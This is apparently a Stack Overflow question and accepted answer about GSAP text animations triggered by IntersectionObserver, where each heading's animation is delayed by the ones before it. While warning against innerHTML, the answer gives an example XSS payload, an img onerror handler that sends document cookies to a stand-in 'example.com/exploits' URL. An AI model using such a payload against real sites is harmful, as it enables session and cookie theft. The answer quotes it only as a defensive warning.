# Each new animated element with IntersectionObserver gets an unwanted delay

Tags: javascript, foreach, gsap, intersection-observer

I am using IntersectionObserver to animate every `h1` on scroll.
The problem, as you can see in the snippet, is that the animation triggers every time for every h1. This means that every new animation of the intersecting `h1` needs to wait for the previous ones to be finished and the result is basically a sort of incremental delay for each new `entry.target`. That's not what I want.
I tried to remove the `anim-text` class before and after unobserving the `entry.target`, but it didn't work. 
I think the problem is in the `forEach` loop inside the //TEXT SPLITTING section, but all my efforts didn't solve the problem.

Thanks in advance for your help!

```js
const titles = document.querySelectorAll("h1");

const titlesOptions = {
  root: null,
  threshold: 1,
  rootMargin: "0px 0px -5% 0px"
};
const titlesObserver = new IntersectionObserver(function(
  entries,
  titlesObserver
) {
  entries.forEach(entry => {
    if (!entry.isIntersecting) {
      return;
    } else {
      entry.target.classList.add("anim-text");
      // TEXT SPLITTING
      const animTexts = document.querySelectorAll(".anim-text");

      animTexts.forEach(text => {
        const strText = text.textContent;
        const splitText = strText.split("");
        text.textContent = "";

        splitText.forEach(item => {
          text.innerHTML += "<span>" + item + "</span>";
        });
      });
      // END TEXT SPLITTING

      // TITLE ANIMATION
      const charTl = gsap.timeline();

      charTl.set(entry.target, { opacity: 1 }).from(".anim-text span", {
        opacity: 0,
        x: 40,
        stagger: 0.1
      });

      titlesObserver.unobserve(entry.target);
      // END TITLE ANIMATION
    }
  });
},
titlesOptions);

titles.forEach(title => {
  titlesObserver.observe(title);
});
```

```css
* {
  color: white;
  padding: 0;
  margin: 0;
}
.top {
  display: flex;
  justify-content: center;
  align-items: center;
  font-size: 2rem;
  height: 100vh;
  width: 100%;
  background-color: #279AF1;
}

h1 {
  opacity: 0;
  font-size: 4rem;
}

section {
  padding: 2em;
  height: 100vh;
}

.sec-1 {
  background-color: #EA526F;
}

.sec-2 {
  background-color: #23B5D3;
}

.sec-3 {
  background-color: #F9C80E;
}

.sec-4 {
  background-color: #662E9B;
}
```

```html
<script src="https://cdnjs.cloudflare.com/ajax/libs/gsap/3.2.5/gsap.min.js"></script>
<div class="top">Scroll Down</div>
<section class="sec-1">
  <h1>FIRST</h1>
</section>
<section class="sec-2">
  <h1>SECOND</h1>
</section>
<section class="sec-3">
  <h1>THIRD</h1>
</section>
<section class="sec-4">
  <h1>FOURTH</h1>
</section>
```

Comment: instead of setting CSS properties directly, can I recommend writing a proper CSS class with your animation as a transition/`@keyframes` approach, so on the JS side all you have to do is toggle the CSS class and be done?

Comment: I am using gsap throughout the site. I simplified the animation in the snippet a lot, in order to make it more legible. Gsap offers the very handy `stagger` property, which I am using for this animation.

Comment: Then at the very least you want to add `gsap` as tag, so people who have signed up for gsap-related questions get a notification. Also, there is a fair bit of further reducing you can do here: if each `h1` waits for the previous one, then all you need is your `<script>` load, and the four `<h1>` elements, no HTML around it, and CSS that just makes `<h1>` be 1em high, so they all immediately show: if the problem is they reveal one-by-one, that will immediately start happening, no need to scroll. Similarly, the JS can be compacted quite a bit.

Answer (score 1, accepted):

Let's simplify a bit here, because you're showing way more code than necessary. Also, you're doing some things in a bit of an odd way, so a few tips as well.

1. You had an `if (...) { return } else ...`, which doesn't need an `else` scoping: either the function returns, or we just keep going.
2. Rather than checking for "not intersecting" and then returning, instead check for insersecting and then run.
3. You're using string composition using `+`: stop using that and start using modern templating strings. So instead of `"a" + b + "c"`, you use `` `a${b}c` ``. No more `+`, no more bugs relating to string composition.
4. You're using `.innerHTML` assignment: this is incredibly dangerous, especially if someone else's script updated your heading to be literal HTML code like `<img src="fail.jpg" onerror="fetch('http://example.com/exploits/send?data='+JSON.stringify(document.cookies)">` or something. Never use `innerHTML`, use the normal DOM functions (`createElement`, `appendChild`, etc).
5. You were using a lot of `const thing = arrow function` without any need for `this` preservation: just make those normal functions, and benefit from hoisting (all normal functions are bound to scope *before* any code actually runs)
6. When using an observer, unobserver *before* you run the code that needs to kick in for an observed entry, especially if you're running more than a few lines of code. It's not fool proof, but does make it far less likely your entry kicks in a second time when people quicly swipe or scroll across your element.
7. And finally, of course, the reason your code didn't work: you were selecting *all* `.anim-text span` elements. Including headings you already processed. So when the second one scrolled into view, you'd select all `span` in both *the first and second* heading, then stagger-animate their letters. Instead, you only want to stagger the letters in the current heading, so given them an `id` and then query select using `#headingid span` instead.

However, while 7 sounds like the fix, thanks to how modern text works you still have a potential bug here: there is no guarantee that a word looks the same as "the collection of the letters that make it up", because of ligatures. For example, if you use a font that has a ligature that turns the actual string `=>` into the single glyph `⇒` (like several programming fonts do) then your code will do rather the wrong thing.

But that's not necessarily something to fix right now, more something to be mindful of. Your code does not universally work, but it might be good enough for *your* purposes.

So with all that covered, let's rewrite your code a bit, throw away the parts that aren't really relevant to the problem, and of course most importantly, fix things:

```js
function revealEntry(h1) {
  const text = h1.textContent;
  h1.textContent = "";

  text.split(``).forEach(part => {
    const span = document.createElement('span');
    span.textContent = part;
    h1.appendChild(span);
  });

  // THIS IS THE ACTUAL FIX: instead of selecting _all_ spans
  // inside _all_ headings with .anim-text, we *only* select
  // the spans in _this_ heading:
  const textSpans = `#${h1.id} span`;

  const to = { opacity: 1 };
  const from = { opacity: 0, x: -40, stagger: 1 };
  gsap.timeline().set(h1, to).from(textSpans, from);
}

function watchHeadings(entries, observer) {
  entries.forEach(entry => {
    if (entry.isIntersecting) {
      const h1 = entry.target;
      observer.unobserve(h1);
      revealEntry(h1);
    }
  });
};

const observer = new IntersectionObserver(watchHeadings);
const headings = document.querySelectorAll("h1");
headings.forEach(h1 => observer.observe(h1));
```

```css
h1 {
  opacity: 0;
  font-size: 1rem;
}
```

```html
<script src="https://cdnjs.cloudflare.com/ajax/libs/gsap/3.2.5/gsap.min.js"></script>
<h1 id="a">FIRST</h1>
<h1 id="b">SECOND</h1>
<h1 id="c">THIRD</h1>
<h1 id="d">FOURTH</h1>
```